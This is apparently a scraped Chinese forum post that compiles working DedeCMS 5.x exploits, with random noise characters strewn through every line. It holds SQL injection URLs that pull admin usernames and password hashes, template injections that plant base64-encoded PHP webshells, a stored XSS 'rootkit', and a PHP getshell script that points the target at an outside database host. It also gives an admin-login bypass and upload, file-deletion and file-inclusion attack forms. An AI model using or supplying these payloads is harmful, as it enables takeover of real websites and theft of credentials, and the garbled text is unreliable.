|
|
1 ~4 D1 O- z/ t jDedecms 5.6 rss注入漏洞, H# p# a/ p6 |; q8 Q; u
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
5 a; Q |& N: Y8 V( z
1 Z3 j' u0 @0 M/ t/ v5 I
. I8 J) ]* u6 ~. }# E
( d; V+ u1 ` J+ ]) r0 W. H, y* B% [- E; D+ b
% v* b7 j5 I6 r4 M8 M& u6 G
8 c: u. e1 B5 @. u+ {3 S
9 k9 j0 t# ~, h& R2 C, W
- F; s' c/ B" m, LDedeCms v5.6 嵌入恶意代码执行漏洞
4 n% F: j9 l1 H注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}! o" s) {( _, u# n ~
发表后查看或修改即可执行
& o$ v) ?) Z. Q7 V" S6 ha{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}. |$ e: V/ f4 E, y& ^
生成x.php 密码xiao,直接生成一句话。! w# J& o8 ^4 b. [6 U* U
V8 Y: j) q0 d" o
$ d" ?- g1 y3 D) Y: E6 l" B3 u+ e( |9 Z. @/ u4 Z
+ h( \/ V! u1 ?- \9 z; M; o5 I. g% i1 C, W* `& y' f
% d t3 `1 \! F% s
8 ~6 a/ m/ y& t @- h- |$ i- H1 ~9 {7 E6 b4 u' }. P, r# S9 B
Dede 5.6 GBK SQL注入漏洞
# d8 \6 `7 N' u' _http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';+ k( }8 i+ c2 a; h, O' m
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe2 h- ~6 X5 H: w. j% i
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A72 e5 N8 d" r( F8 y
" x) }5 @& Q6 |5 Q8 U' a+ c1 n$ T7 o8 m3 d
# f/ e1 [/ |2 t+ l# P, {
. P6 C6 B1 j6 A$ z: i$ q# e
' D+ v& q. u# f1 W) I# ~
% y8 T, W: m7 [2 [- Q+ p# U4 `1 [! g) A: i9 L0 R
2 b) O, J, Q+ Z& `1 `DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞: Q- R) `$ i7 o8 `* J; }6 t
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
2 m( d3 g" W& U5 ]. E
: [1 L. J, X2 N' |7 l
/ ]1 v( G7 u5 r3 h4 }7 C
) B) W8 O7 A8 P5 j7 u8 q$ m& o0 \' X4 H( J( _; P9 p
7 X( _8 z6 z; T, O
8 T' f* d1 q6 B; y& }4 c U6 vDEDECMS 全版本 gotopage变量XSS漏洞! k: @7 A2 `5 Q" ?1 ?6 l
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 8 z9 b" Z. Y* C
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
8 U% F* |, \6 ?
0 a- |; x" F1 ]& f+ z" J. }+ F0 D5 n( b
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 - f& Q$ ? o+ g8 b# ^- w& P- F# _) G- o
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda* U( {. M% ~; j% [! L0 l
1 J2 j1 L: S a' s" B: w' a
$ C; G0 D" d3 n" ~/ k( i8 K: r9 n# Q; Zhttp://v57.demo.dedecms.com/dede/login.php u% l3 w- Q% l
8 L, p) v& H" J D ~5 U6 a8 q! F# a' f
color=Red]DeDeCMS(织梦)变量覆盖getshell
( u- {6 p2 `$ L0 m0 B" v#!usr/bin/php -w4 x' F6 A9 t& z
<?php
" P. g% h$ g: ~, \" P+ E: Derror_reporting(E_ERROR);
8 A+ V. |4 R Y0 y# P9 zset_time_limit(0);1 _( Z4 ]1 h& {7 L o) @
print_r('7 I, F2 b9 i) }2 ]! |
DEDEcms Variable Coverage8 k8 n$ H$ g0 D& ~% h& r
Exploit Author: www.heixiaozi.comwww.webvul.com2 H8 y! [5 s, |( H l
);
& c* x$ g" R2 w2 M3 l( y2 m* qecho "\r\n";
1 R @. o, t3 M$ C" E: }6 aif($argv[2]==null){* E% M9 F8 W2 R6 F l, b5 i
print_r('/ o# z R. @* `; G/ R
+---------------------------------------------------------------------------+
0 [! }, z* F7 z% oUsage: php '.$argv[0].' url aid path7 I" a# V0 v$ `# s: H- |
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/" v6 {3 `/ j: {5 \ [! \8 _( Y
Example:! D+ n$ b- B: s: N
php '.$argv[0].' www.site.com 1 old. C7 y9 x& @, P. b* O1 M, _+ F1 X
+---------------------------------------------------------------------------+
) V g0 G6 O0 K, i1 @* s( L4 T');
, o3 \ o# U$ ?; Yexit;1 Y: w% e, G. X+ P5 f/ b
}. q0 K- Z) z) D6 I6 S5 o, t
$url=$argv[1];
6 o$ F$ k- P9 v3 d. s$aid=$argv[2];
. b* o! E* X" W$path=$argv[3];
# X! E' V/ F3 f5 G6 j& h Z$exp=Getshell($url,$aid,$path);1 h% E D* N8 \: h
if (strpos($exp,"OK")>12){! } A( J& g3 r" i6 u
echo "
0 P( c, Q$ j7 g ZExploit Success \n"; C& |+ E8 g$ H/ ]. P$ D. K" i
if($aid==1)echo "5 V/ Y9 G& }, N, K+ G* H
Shell:".$url."/$path/data/cache/fuck.php\n" ;
' R4 r D/ N) `$ d5 ^
' n1 A A% N/ B e2 }) {* f4 \2 U+ _& u. v% U A" i
if($aid==2)echo "6 B( b o- v4 [4 C
Shell:".$url."/$path/fuck.php\n" ;
3 d; P, Y- A6 n5 U7 b3 |
& u9 j1 M* ^+ I5 ~9 T' q. s* @) {+ F
" o( q" H D; c: v$ a6 { }if($aid==3)echo "6 |) d7 L S: f7 i) A* p) ?
Shell:".$url."/$path/plus/fuck.php\n";- O. {" S. M/ f: V4 [) h% L; S
! Y N7 c4 R0 h1 z8 W1 e/ @, {: d
3 q0 n: E& E) e+ m8 J7 a}else{0 k1 {- O) W6 e# X* k% n
echo "- Q$ @7 m! F, n6 O) k' ]- J; n7 a8 x
Exploit Failed \n";: [: b& _: L3 I) `
}
- c+ @4 S. v$ ~. x# U! o/ P' xfunction Getshell($url,$aid,$path){
4 A" A4 h' _8 r5 X# ]/ E( v$id=$aid;6 M0 l" @7 f" g6 P
$host=$url;
1 ?( \- y. u$ E& ^* v/ n$port="80";7 y* @( t2 n& S/ a
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
- K& z; ]0 H1 V. {2 `+ a) g# ^$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
w5 F5 K2 ], \! n, X$data .= "Host: ".$host."\r\n";( A8 A' M, L$ d% y! g# q
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
- Q& N5 B/ K5 ~0 V$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";! C' i! _# i; @: @# p
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
* Y# ?* _9 L5 p @- k//$data .= "Accept-Encoding: gzip,deflate\r\n";
6 X0 s4 S# Z& Y$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";% K' x- E* q" a' W8 ], I" P) }
$data .= "Connection: keep-alive\r\n";4 I( f0 W" }3 W# D2 `' c2 J! p
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
8 \8 r0 z. S4 S. B2 M* {% e$data .= "Content-Length: ".strlen($content)."\r\n\r\n";' X' R) I8 J1 m( w9 n
$data .= $content."\r\n";" h; g `' E" J, [
$ock=fsockopen($host,$port);
3 C C$ A% j ^5 y/ ^4 oif (!$ock) {
: U# U( a |- `5 a1 F' vecho "
9 p: {1 {6 W9 i1 M& g6 n& C8 cNo response from ".$host."\n";5 [& Q/ I" k) |9 Y4 u+ ^6 B
}9 r6 e% ^# Q, R5 u- V8 C
fwrite($ock,$data);
* e3 ]3 _* O7 E8 Cwhile (!feof($ock)) {( q f* _; E- Z! Q9 z; \0 d& l
$exp=fgets($ock, 1024);
0 K5 N& Y' g; |1 o1 Greturn $exp;
$ ]) ^& R0 l. ~4 W5 a0 [}0 d' h: r* w7 s, K/ |6 k
}
* P9 B5 x7 ^6 O- o- b# J& ^. c
6 N9 ]8 ^. e% ~6 |$ n" m' Y9 l?>
0 ~/ ^2 v" s. \# M* B' h7 |. {
( }! `" |( N/ ^6 R" \& P
% }; \) x7 p9 @& ~" G
( V9 G) A9 T0 h' r2 F' C- c( K' o& p
) L' a) C7 X' `
1 s1 ?: C- z" y9 t
8 T. c R7 I9 S m7 A
' t3 U/ f- `/ H, V" p: g' v
: K) X6 ^8 Q2 } C2 c
9 o1 ? Y2 ~' H; a+ x S5 j- oDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)' r! x `2 A) n8 {( Z" F& q
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
$ B4 i, {8 C7 C, K! {7 R6 p. v+ x0 L: |6 I
7 q3 D: X5 E. D把上面validate=dcug改为当前的验证码,即可直接进入网站后台
- Q9 V1 e# [$ m6 W1 K. C- S! V* `( I! j5 E, }* S
5 i2 d/ y. A0 Y+ P
此漏洞的前提是必须得到后台路径才能实现
. }0 X0 ^; n: C1 t3 v
`/ \/ t8 X _3 x( ~; X+ A# _
5 @/ }$ A" J% b. K( q8 N5 H0 y
/ `4 t% C7 u7 s6 {9 Y* U
$ f$ i: }) Z# O; F9 F) v
9 M' G; z- V. Y: o4 C: F8 _
9 i, p* }# p. J( |0 N: g% d* c, u
% k4 m5 w- [% t6 H
+ F, i* q W; S4 T! }" K: I. ~! g' d; c7 j2 H
Dedecms织梦 标签远程文件写入漏洞. k K7 g8 U6 T
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');4 v$ O4 z5 i: I$ x/ ?4 K% `
( ~' H% @+ Q" @$ \6 B
, J4 k6 w% Z; L: }
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
" W# S$ k+ h3 p: J0 B6 [+ y& f/ \<form action="" method="post" name="QuickSearch" id="QuickSearch">8 x7 `+ K5 x& L8 W7 Y$ t
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />4 _9 S8 |! {- x+ m4 ~' l8 y$ u
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
Q" ~6 n* ~* l7 ]" l<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />6 A/ [9 X4 X Z
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />; b, C% d1 C/ ~( c! R
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
" j( r: q& V: R- k8 A" N+ o2 Y<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
l% c" R3 ]: b1 B& h6 e' w" S<input type="text" value="true" name="nocache" style="width:400">2 j6 u- H/ G5 ~! n& _
<input type="submit" value="提交" name="QuickSearchBtn"><br />
! a2 n; H7 w. v( Q</form>" V5 a% |9 i: a4 p+ P1 G- b' |
<script>
" G% e) P2 |! l7 V" b' rfunction addaction()
% j0 g6 j- v4 e' M3 {+ N{
: {) Z3 h I, C6 y( Zdocument.QuickSearch.action=document.QuickSearch.doaction.value;
! }& D( q; B6 p9 E/ S) H}$ \: M1 j9 |: A3 H8 |/ D( ~# Q
</script>
; q8 D% a! n9 P8 R1 r
$ _9 @2 u) R" i6 Z! \2 L
# e6 J% ^% G1 t8 A& G2 `# t; f: z, s, N2 f1 u/ Z8 Z
1 R! B7 B+ O9 h" _" @
5 Q, g/ K% p$ d
; D3 R7 }! G. I b. G9 b
3 O. L' h9 e$ Q* q! Z6 s+ T* w. J7 j# j e5 V4 n
# c% ]& F2 {, I
+ b: [- _5 z+ u2 b w2 sDedeCms v5.6 嵌入恶意代码执行漏洞" k# Q: B7 r4 [$ C) e6 q4 o y
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行- e& d5 Z/ l! {5 r1 f
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}( F x* z s# p% [
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
& ^9 z- {; A* b7 SDedecms <= V5.6 Final模板执行漏洞
7 L5 D8 ~# a2 r v注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
- x0 A, ` k# K: ?7 H* }uploads/userup/2/12OMX04-15A.jpg- t+ s( H7 g7 \1 S3 X* A0 a
) `8 z: ~% n' f
& i/ ^0 X# R" @0 ^( H模板内容是(如果限制图片格式,加gif89a):
; M) M; @( M; Y e _{dede:name runphp='yes'}) s, ^: |7 Q6 a# S- h7 {8 C
$fp = @fopen("1.php", 'a');( }. p" s' J( s& Z7 z
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
' z6 }% D% n8 G2 z$ E* i@fclose($fp);
# }. D- H7 `- j& V{/dede:name}: f; T% j6 e& m- L% Z" v
2 修改刚刚发表的文章,查看源文件,构造一个表单:
R) ]2 L7 R7 z: H+ x<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
/ V1 t' r( ^+ q/ a( B+ V( m5 B<input type="hidden" name="dopost" value="save" />
$ T* }* I3 I& i9 ^; P* r<input type="hidden" name="aid" value="2" />
1 ^3 M$ X5 ?) Y- t6 F, t<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
$ B3 l* ^& D* B# x1 \# k: @4 \<input type="hidden" name="channelid" value="1" />* c& x8 [- v3 t" Q* N: V, m4 R% n, l6 x
<input type="hidden" name="oldlitpic" value="" />& ~ g( o; G& m8 }; }9 G+ i
<input type="hidden" name="sortrank" value="1275972263" /> r, v4 b8 `; B, M/ u
: b a# ?0 y' r8 y n7 Q1 h( Z' x" P0 Q+ k1 [" \
<div id="mainCp">& H, u8 l& t/ w" n( m( l; w
<h3 class="meTitle"><strong>修改文章</strong></h3>+ U1 U R1 v: k8 A0 B% f
- G, L* o3 m+ q L
- W! J5 Q+ Y! ^5 L6 |<div class="postForm">
5 x6 F/ l% H/ f/ X' _, G' u& R! k9 a' k<label>标题:</label>
6 Z1 y' a# j5 j7 i- [: T. D<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>) I% l5 P& M$ k, H3 n! q0 R
& c7 z0 D1 j5 \
' b& M# D4 n. n$ E8 @0 f8 E<label>标签TAG:</label>6 k! M q# |5 @* X. }: Z! G
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
2 a. l6 o! r0 U$ h* S6 Q
8 V1 {# s$ K( _2 P# \. n
* r, L; U6 X3 Y. j7 u<label>作者:</label>
& r+ f3 F' K2 r- I" @- Q) v<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>, v9 [( T$ Z P) \
0 z0 u( \% `2 _8 B% Q2 f2 I# g
" B* Z7 K* m7 }& ^7 r
<label>隶属栏目:</label>
* ~1 R( E2 }. U6 a- n$ `<select name='typeid' size='1'>9 ^9 \( l; D4 t
<option value='1' class='option3' selected=''>测试栏目</option>; q2 d( n8 e7 V" i1 N% N* k. r
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)* ~7 y- x+ c7 X
1 L/ T$ D' E) W- F. i1 Z
4 E B/ z# ~' q( X7 W( O! J<label>我的分类:</label>
; ~6 \% P. o: ^9 V; B<select name='mtypesid' size='1'>
/ H: F8 f2 f- n7 a<option value='0' selected>请选择分类...</option>
$ z3 v6 ~5 E4 X* l5 d- f<option value='1' class='option3' selected>hahahha</option>
3 _1 h+ u, I* O" w</select>
% ~8 G& A9 `/ b- D1 \ ]/ T+ J. y2 r, z" b
9 a- a) X" t! W& T z6 |1 u
<label>信息摘要:</label>
/ O. Z+ E, t* \. t. _- q. m<textarea name="description" id="description">1111111</textarea>
5 U" d$ N$ ^2 D7 J(内容的简要说明)
7 ~# h: e! d' b L! O+ [, U; s h2 m' N0 y" l9 I( J/ I6 V
) W( S5 ]+ v3 Q/ H
<label>缩略图:</label>; M* A- c# _* |# q
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
! A( S/ n( [3 x, x U0 W/ Q f: ?8 v$ I
$ u) D/ T% j- k6 @
<input type='text' name='templet'- ^* M6 D$ k# t5 ^7 r
value="../ uploads/userup/2/12OMX04-15A.jpg"> `* t8 U0 R5 [9 Q h
<input type='text' name='dede_addonfields'% J6 Z) l# A1 _0 {/ R9 x& Z
value="templet,htmltext;">(这里构造)
+ Q( I I' B% {8 v d4 G7 [- l* f</div>
; J' ~9 t. j; d4 X- A0 H! ^1 @
: H3 d- B2 T5 M- P2 E7 u( f2 |3 v4 A3 Z! Q# ^' |6 A
<!-- 表单操作区域 -->
3 y, }" c* K+ O* C6 w$ G4 y<h3 class="meTitle">详细内容</h3>
, `) Q# `/ V5 ?. `$ Q) b8 t: _" j2 ?( ?1 n5 b5 _! l! b
# r$ A, T* _* y" s$ C<div class="contentShow postForm">
0 a4 O5 \3 b# \7 _8 _2 b<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
1 S, {. P% C6 { b! a# V
. J$ x# ?1 J1 x7 _ P& V. W+ \ j% S) I. F" R
<label>验证码:</label>
9 {/ r1 \( A. R s0 g- B( z<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' /> n+ l3 s' p% x1 Q: K
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
2 K. M3 S1 W. ~+ ]9 W* f0 b8 f
( c c5 F$ {$ X. q. q) M3 y* w<button class="button2" type="submit">提交</button>
& o' m/ [6 Y, ` A+ F; Z: t<button class="button2 ml10" type="reset">重置</button># l( p3 f( r; T1 s" h' @7 i4 ~# W
</div>
9 s" T/ z! T; l2 M$ P* z
% t4 ]% y8 d9 _
/ U+ [- ~8 H: H# y/ B. E7 j# o</div>
" D% T1 F5 D/ ]% e5 o/ C+ y$ j
0 x/ x3 [2 C* h+ q- F& K3 H0 c. i7 u# a! E" f# a
</form>
! m. x% H$ D: g7 w% @
) J& y; P5 k' O; M/ Z/ Y5 ~$ Y
! Q7 h. p: ~1 E5 c p2 f提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
* o4 |) g$ F" s假设刚刚修改的文章的aid为2,则我们只需要访问:
. f3 D4 h0 V/ t$ G9 k8 L* zhttp://127.0.0.1/dede/plus/view.php?aid=2
1 ]; V! i) B' R) f# G* f W即可以在plus目录下生成webshell:1.php
$ ~0 n& c8 c# C0 N1 x, i6 g. k" t9 N3 O7 S5 c" w3 k
4 |" Z( O/ G' _! l; b
/ M# i" n7 L" X8 O; v6 |
' K M# p9 ~6 [ D/ B3 R
. j/ ~* H0 X! [# a. [8 ]; N# }
^1 a* C( u8 Y+ ]) `( l3 z; S! E8 @9 u# _7 N9 m' M: Z, _0 e
5 P0 ~ w5 t5 {8 F* h1 y* ^: V5 z8 W/ J3 A& S, Y) w
( f5 C. A4 _9 t. k" K2 b
/ q$ ?$ ^4 X p2 P( o; Y9 K
2 M+ |0 j) q) s- ~" n- \DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
, P' v8 G/ J$ J# b' V, _' uGif89a{dede:field name='toby57' runphp='yes'}
9 \" R( P1 F) Cphpinfo();! \# C$ U5 H8 A# ^
{/dede:field}
2 d! z6 {- I3 l5 I/ `0 v& }1 m保存为1.gif0 i2 h+ E1 s8 y6 ~* p, u5 Q
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> W3 J0 z; I) C$ {
<input type="hidden" name="aid" value="7" /> 4 p o5 j. D; ?8 T
<input type="hidden" name="mediatype" value="1" />
. K. U" }& x4 r8 |! p; D! K. C<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 2 C( _7 j% c$ l
<input type="hidden" name="dopost" value="save" />
: C. x- i& [- {( ^+ a5 B<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ) i. l$ m. ?0 l. ^+ [- j3 k' a
<input name="addonfile" type="file" id="addonfile"/> $ d; S( S' V/ o
<button class="button2" type="submit" >更改</button>
& e0 {9 [! i+ r ~- G</form>
$ H! h) m8 b3 O% a9 }7 o' z' e3 d, f' c6 E1 h% c
) _) ~0 I, D. f+ y' k% s x# _ r; |
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
- O# ?% V7 V5 F+ }) A发表文章,然后构造修改表单如下:4 d# f" v( O; r) }2 ]# K B6 I
- r/ |/ y" S+ s1 |& z/ Y( S) V+ e( K! p; ?4 {
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> & }: ^' T9 b2 N7 l8 U3 N7 j' h) a$ N j
<input type="hidden" name="dopost" value="save" />
2 x S& ^8 j$ P \<input type="hidden" name="aid" value="2" /> ( H& c; r* V3 {$ y
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
! G/ b* n1 R$ l/ b3 _- u; L# h% R<input type="hidden" name="channelid" value="1" /> ! M/ ]! |* U6 h
<input type="hidden" name="oldlitpic" value="" /> ' Q4 L& Z3 i0 W
<input type="hidden" name="sortrank" value="1282049150" /> 9 h( v' u1 y7 R( Y
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
+ P2 g3 s( U% }; ^<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
$ }" C5 K0 j0 u; H<select name='typeid' size='1'> 7 r9 F) g8 w- b2 a
<option value='1' class='option3' selected=''>Test</option>
+ X j4 I' D7 d, f+ U) U<select name='mtypesid' size='1'>
7 _& I( C' T! P1 G4 s' ]) _<option value='0' selected>请选择分类...</option> 3 B: p" r- m& F: K8 F, R/ W
<option value='1' class='option3' selected>aa</option></select> $ ~' G. E7 t, \8 b" D7 b
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 0 d E2 A# n% j F' Z+ M
<input type='hidden' name='dede_addonfields' value="templet"> : @' `" V% _0 A# q; a
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
" u4 s; y/ u( i<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
: D( w6 p8 n( X9 Y0 n& ^* W<button class="button2" type="submit">提交</button>
8 A3 f; L& J) I$ w2 k; K2 {8 A0 f</form>; C+ r0 Z9 j! W3 q6 B
- I& Q* l: s8 b$ [# ?. Y4 a) }1 Y+ |' a
6 V" z" u% E' T: i/ z- \' p5 ~. @
9 D9 {: f4 c6 d8 y8 a2 r6 \/ c" e4 W% h7 w" w8 N
# j% X2 s! ]9 _. E% h- Z: B8 P% f, L8 ?; P2 i' T
% n7 K7 G6 e$ ~( ?5 D Z. C( d7 @( K) R9 i: M6 S& U, P6 v
: P/ S( t9 Q5 \- @' L& D6 G7 D
; k% n! G* F) j织梦(Dedecms)V5.6 远程文件删除漏洞
0 D% o2 P' k" `+ |2 vhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif% x' h# F0 @1 w" A
5 u4 z, t$ v/ T' t
& \: t) j* `; X* W, I2 y. `
) m, F S' W1 W- u2 Q( R) c' N$ P7 k$ X
& ^2 H3 T) W! ]" a- b+ L
5 t5 E: q& k0 g0 p$ d1 L7 e. _3 r
: q! Y \: @7 I1 e- M
8 b% N3 E* J. D$ z8 q
9 }& z+ g/ H! t' \8 ]+ `
) d& k2 N) b$ `. m& M% y: q" t织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 & h6 \' j: C4 R5 l, y g# [% L- c
http://www.test.com/plus/carbuya ... urn&code=../../
2 ^! l& s$ c2 R: V9 O& K& u
6 y; k. Q. r U' x1 O+ B. m4 R9 l6 [* V ?) a2 r! H4 b
! F" |$ \! f$ t
6 @2 a: \5 V. f5 x
+ a5 X, ? q5 P n( T
^" V+ o* j2 @* R4 U8 m4 a5 }1 N9 O0 h6 d
' N" i# F7 b( A: R0 y
' R' @ }4 Y2 I. a
' q! M% C7 i& K6 T; c4 m+ q
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
! o" x4 G( E: t( |plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`& E Q0 w; p% B- t. S
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
2 E7 K q# V8 P1 q* M2 H- \2 b8 s0 z! S5 A2 p* x# x7 d2 ~
! g; M7 N! ?+ e
. |8 I' R$ U( M6 h b& C
5 f. S5 P# f' P$ ~$ _; a: j
@* C# J7 K: g! W3 _3 i2 M
% N8 q4 m) E+ R! z3 b5 \2 j
. g" D. U0 ]! Y6 a6 r2 o# p3 M% n4 v% M9 f
* u1 v" g$ c* x- }
* `4 i S" B1 w
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
# c7 b( B8 j( Bhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='& \( q1 b N0 H; s: m/ e8 R; f- N9 @
0 z( {4 y6 c: J/ i2 r# g k! p6 |' z! r- y7 O% n
" ]) f. J; b) w }$ @# ^" F
6 k# I; ?' J0 P3 g( [4 ?7 G, f# {. w/ K i6 e3 W6 r
% |" r$ ~# F2 }- N& W1 O& ^
8 W' j( E7 G$ Z) h5 k
9 x9 X' Y7 G; V1 O1 U! s# a: k! K5 ^- n' U
6 |- m3 u8 } R( J K7 y8 i+ L+ ]织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
, {. N, T+ u! R1 K, q s5 C+ q7 L3 n2 d<html>
! @0 u" {8 T$ c5 T6 m* E<head>
. `5 R; k& ^5 W+ [' u5 r<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
8 j8 g6 p# B3 P ~+ z</head>
